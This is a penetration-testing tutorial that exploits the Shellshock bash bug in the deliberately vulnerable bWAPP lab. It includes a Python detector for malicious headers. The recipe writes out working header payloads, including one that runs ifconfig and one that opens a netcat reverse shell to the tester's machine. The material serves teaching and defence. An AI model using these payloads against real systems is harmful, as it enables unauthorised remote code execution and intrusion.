Executing commands with Shellshock

Shellshock (also called Bashdoor) is a bug that was discovered in the Bash shell in September 2014, allowing the execution of commands through functions stored in the values of environment variables.

Shellshock is relevant to us as web penetration testers because developers sometimes use calls to system commands in PHP and CGI scripts—more commonly in CGI—and these scripts may make use of system environment variables.

In this recipe, we will exploit a Shellshock vulnerability in the bee-box vulnerable virtual machine to gain command execution on the server.

How to do it...

  1. Log into http://192.168.56.103/bWAPP/.
  2. In the Choose your bug: drop-down box, select Shellshock Vulnerability (CGI) and then click on Hack.

    On the page, we can see something interesting: Current user: www-data. This may mean that the page is using system calls to get the username. It also gives us a hint: Attack the referrer.

  3. Let's see what is happening behind the scenes: use BurpSuite to record the requests and repeat step 2.
  4. Let's look at the proxy's history.

    We can see that there is an iframe calling a shell script: ./cgi-bin/shellshock.sh, which might be the script vulnerable to Shellshock.

  5. Let's follow the hint and try to attack the referrer of shellshock.sh. First, we need to configure BurpSuite to intercept server responses: go to Options in the Proxy tab and check the box labelled Intercept responses based on the following rules.
  6. Now, set BurpSuite to intercept and reload shellshock.php.
  7. In BurpSuite, click Forward until you get to the GET request to /bWAPP/cgi-bin/shellshock.sh. Then, replace the Referer with:
     () { :;}; echo "Vulnerable:"
  8. Click Forward again, and once more on the request to the .ttf file; we should then get the response from shellshock.sh.

    The response now has a new header called Vulnerable. This is because the server integrated the output of the echo command into the response headers, so we can take this further.

  9. Now, repeat the process and try the following command:
    () { :;}; echo "Vulnerable:" $(/bin/sh -c "/sbin/ifconfig")
  10. Being able to execute commands remotely on a server is a huge advantage in a penetration test, and the next natural step is to obtain a remote shell. Open a terminal in Kali Linux and set up a listening network port, as shown here:
    nc -vlp 12345
  11. Now go to the BurpSuite proxy's history, select any request to shellshock.sh, right-click on it and send it to Repeater.
  12. Once in Repeater, change the value of Referer to:
    () { :;}; echo "Vulnerable:" $(/bin/sh -c "nc -e /bin/bash 192.168.56.1 12345")

    In this case, 192.168.56.1 is the address of our Kali machine.

  13. Click Go.
  14. If we check our terminal, we can see the connection established; issue a few commands to check whether or not we have a remote shell.

How it works...

In the first five steps, we discovered that there was a call to a shell script and, since it would have been run by a shell interpreter, that interpreter may have been bash, and possibly a vulnerable version of bash. To verify that, we performed the following test:

() { :;}; echo "Vulnerable:"

The first part, () { :;};, is an empty function definition. Bash can store functions in environment variables, and this is the core of the vulnerability: the vulnerable parser keeps interpreting (and executing) whatever follows the function's closing brace. That allows us to append the second part, echo "Vulnerable:", a command that simply echoes what it is given as input.

The vulnerability is reachable through the web server because the CGI implementation maps all parts of a request, headers included, to environment variables, so this attack also works if done over User-Agent or Accept-Language instead of Referer.
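The two points above, that bash imports function definitions from environment variables and that CGI copies every request header into that environment, are what a detection rule has to account for: inspecting only Referer would miss the same payload in any other header. The following example is added here and is not code from the book or from bWAPP. It maps headers to the CGI variable names a server hands to a script (the HTTP_ prefix convention from RFC 3875), flags any value that starts with a function definition, and, as a separate function, runs the well-known local check on the machine's own bash binary (a function-valued variable whose body is followed by a harmless echo). The header names, request samples and the variable name "probe" are constructed for the example.

```python
import re
import shutil
import subprocess

# Signature of a function definition as bash 4.3 and earlier imported it from
# the environment: "()" followed by "{". Whitespace between the tokens varies
# between payloads, so match loosely.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def cgi_env_from_headers(headers):
    """Map HTTP request headers to the CGI environment-variable names a
    server such as Apache passes to the script (RFC 3875 convention:
    HTTP_ prefix, upper case, '-' becomes '_')."""
    env = {}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def find_shellshock_payloads(headers):
    """Return (cgi_variable, value) pairs whose value looks like a function
    definition followed by trailing commands. Every header is checked, not
    only Referer, because every header ends up in the CGI environment."""
    findings = []
    for var, value in cgi_env_from_headers(headers).items():
        if SHELLSHOCK_RE.search(value):
            findings.append((var, value))
    return findings


def probe_local_bash(bash=None):
    """Classic local check: export a function-valued variable ("probe" is a
    constructed name) whose body is followed by an extra echo, start bash,
    and see whether the echo ran. Returns True (vulnerable), False (patched)
    or None when no bash binary is available."""
    bash = bash or shutil.which("bash")
    if not bash:
        return None
    env = {"PATH": "/usr/bin:/bin", "probe": "() { :;}; echo PROBE_EXECUTED"}
    result = subprocess.run([bash, "-c", "true"], env=env,
                            capture_output=True, text=True)
    return "PROBE_EXECUTED" in result.stdout


# Constructed sample requests (not captured traffic): one benign, one with the
# recipe's test payload in Referer, one with the same payload in User-Agent.
SAMPLE_REQUESTS = [
    {"Host": "192.168.56.103", "User-Agent": "Mozilla/5.0",
     "Referer": "http://192.168.56.103/bWAPP/shellshock.php"},
    {"Host": "192.168.56.103", "User-Agent": "Mozilla/5.0",
     "Referer": '() { :;}; echo "Vulnerable:"'},
    {"Host": "192.168.56.103", "User-Agent": '() { :;}; echo "Vulnerable:"',
     "Accept-Language": "en-US"},
]


def scan_requests(requests):
    """Return (index, findings) for every request carrying a Shellshock-style
    payload in any header."""
    results = []
    for i, headers in enumerate(requests):
        hits = find_shellshock_payloads(headers)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, hits in scan_requests(SAMPLE_REQUESTS):
        for var, value in hits:
            print(f"request {idx}: {var} = {value!r}")
    print("local bash executes trailing commands:", probe_local_bash())
```

The regex deliberately matches the function prefix rather than a specific command after it, because the command part is attacker-chosen; a rule keyed on echo or /bin/sh would miss variants. The local probe only ever runs an echo, so it is safe to use when auditing your own hosts for an unpatched bash.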

Once we knew the server was vulnerable, we issued a test command, ifconfig, and set up a reverse shell.

A reverse shell is a remote shell with the particular characteristic that the connection is initiated by the victim computer, so the attacker listens for a connection instead of the server waiting for a client to connect, as happens with a bind shell.

Once we have a shell to the server, we need to escalate privileges and get the information needed to help with our penetration test.

There's more...

Shellshock affected a huge number of servers and devices all around the world, and there is a variety of ways to exploit it. For example, the Metasploit Framework includes a module that sets up a DHCP server to inject commands into the clients that connect to it; this is very useful in a network penetration test in which mobile devices are connected to the LAN (https://www.rapid7.com/db/modules/auxiliary/server/dhclient_bash_env).
